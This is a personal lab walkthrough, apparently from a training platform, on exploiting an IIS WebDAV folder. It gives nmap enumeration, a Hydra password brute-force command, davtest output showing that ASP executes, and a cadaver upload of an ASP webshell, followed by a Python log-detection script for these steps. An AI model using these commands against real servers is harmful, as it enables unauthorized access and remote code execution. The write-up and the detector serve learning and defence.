First of all, what’s IIA?

  • IIA (Internet Information Access) is Microsoft’s WebDAV implementation for managing files over HTTP/S.
  • It enables users to upload, edit, and delete web content remotely.
  • Integrated into IIS, it provides web authoring capabilities.
  • Misconfigurations can lead to security risks like unauthorized file uploads.
  • Often monitored in security assessments for potential exploitation vectors.
  • Ports: 80 & 443

After this, in the lab I’ve done, I found that there was this IIA service running on port 80, and I used a couple of new tools.

Davtest & Cadaver

Davtest

Essentially used to check whether the WebDAV service is vulnerable to any kind of file execution; for example, in this lab I discovered the target could execute asp files.

Cadaver

Cadaver is a command-line WebDAV client used to interact with WebDAV-enabled servers. In WebDAV exploitation, it helps upload malicious files or manipulate resources on vulnerable servers to gain unauthorized access or execute attacks.

Commands used in the WebDAV lab


sudo nmap -sV -p 80 --script=http-enum IP # Checking for WebDAV
 
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-enum: 
|_  /webdav/: Potentially interesting folder (401 Unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
# The WebDAV directory is password protected, so we must use Hydra.
 
hydra -L /usr/share/metasploit/wordlists/common_users.txt -P /usr/share/metasploit/wordlists/common_passwords.txt IP http-get /webdav/
 
# We must be careful not to cause a DoS.
# After executing this we should get the password; for this lab we already had it.
 
 
# Using davtest now.
 
davtest --auth user:password --url http://ip/webdav
 
 Checking for test file execution
EXEC    jhtml   FAIL
EXEC    aspx    FAIL
EXEC    asp     SUCCEED:        http://demo.ine.local/webdav/DavTestDir_NABkBEUGKFIYcmM/davtest_NABkBEUGKFIYcmM.asp
EXEC    asp     FAIL
EXEC    html    SUCCEED:        http://demo.ine.local/webdav/DavTestDir_NABkBEUGKFIYcmM/davtest_NABkBEUGKFIYcmM.html
EXEC    html    FAIL
EXEC    php     FAIL
EXEC    shtml   FAIL
EXEC    txt     SUCCEED:        http://demo.ine.local/webdav/DavTestDir_NABkBEUGKFIYcmM/davtest_NABkBEUGKFIYcmM.txt
EXEC    txt     FAIL
EXEC    pl      FAIL
EXEC    jsp     FAIL
EXEC    cfm     FAIL
EXEC    cgi     FAIL
 
# We got what we wanted: which file types we can execute, asp in this case.
 
 
# Next step is to upload a webshell. We need to use cadaver.
 
cadaver http://demo.ine.local 
 
# Asks for authentication
 
# Webshell from
 
put /usr/share/webshells/asp/webshell.asp
 
# We got access to the server :D
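
Each step above leaves a trace in the IIS access log. The following is an added example, not part of the original lab notes, that flags the burst of 401s from password guessing, the DavTestDir_ directory davtest creates, and a PUT of an .asp file followed by a request for it. The log lines, the reduced field set, the threshold and the file name upload.asp are constructed assumptions.

```python
from collections import Counter

SCRIPT_EXTS = (".asp", ".aspx")  # assumption: types this IIS site would execute
DAVTEST_MARK = "davtestdir_"     # directory prefix seen in the davtest output above

# Constructed sample in IIS W3C format; real logs carry more fields.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-05-01 10:00:01 10.0.0.5 - GET /webdav/ 401
2024-05-01 10:00:01 10.0.0.5 - GET /webdav/ 401
2024-05-01 10:00:02 10.0.0.5 - GET /webdav/ 401
2024-05-01 10:00:02 10.0.0.5 - GET /webdav/ 401
2024-05-01 10:00:03 10.0.0.5 - GET /webdav/ 401
2024-05-01 10:02:10 10.0.0.5 bob MKCOL /webdav/DavTestDir_x1/ 201
2024-05-01 10:02:11 10.0.0.5 bob PUT /webdav/DavTestDir_x1/davtest_x1.asp 201
2024-05-01 10:02:12 10.0.0.5 bob GET /webdav/DavTestDir_x1/davtest_x1.asp 200
2024-05-01 10:05:00 10.0.0.5 bob PUT /webdav/upload.asp 201
2024-05-01 10:05:09 10.0.0.5 bob GET /webdav/upload.asp 200
2024-05-01 10:06:01 10.0.0.9 alice PUT /webdav/report.txt 201
"""

def parse_w3c(text):
    """Yield one dict per request, taking column names from the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def detect(text, fail_threshold=5):
    """Return a sorted list of (rule, client_ip, detail) findings for /webdav."""
    fails, uploaded, findings = Counter(), set(), set()
    for r in parse_w3c(text):
        ip, uri, status = r["c-ip"], r["cs-uri-stem"].lower(), r["sc-status"]
        if not uri.startswith("/webdav"):
            continue
        fails[ip] += status == "401"  # count authentication failures per client
        if hit := [p for p in uri.split("/") if p.startswith(DAVTEST_MARK)]:
            findings.add(("davtest_probe", ip, hit[0]))
        if r["cs-method"] == "PUT" and status.startswith("2") and uri.endswith(SCRIPT_EXTS):
            uploaded.add(uri)  # remember the path so a later request can be tied to it
            findings.add(("script_upload", ip, uri))
        elif r["cs-method"] in ("GET", "POST") and status == "200" and uri in uploaded:
            findings.add(("uploaded_script_run", ip, uri))
    findings |= {("auth_bruteforce", ip, f"{n} x 401") for ip, n in fails.items() if n >= fail_threshold}
    return sorted(findings)

if __name__ == "__main__":
    print(*detect(SAMPLE_LOG), sep="\n")
```

A script_upload finding under a WebDAV path is also the signal that the folder allows both write access and script execution, which is the misconfiguration to remove.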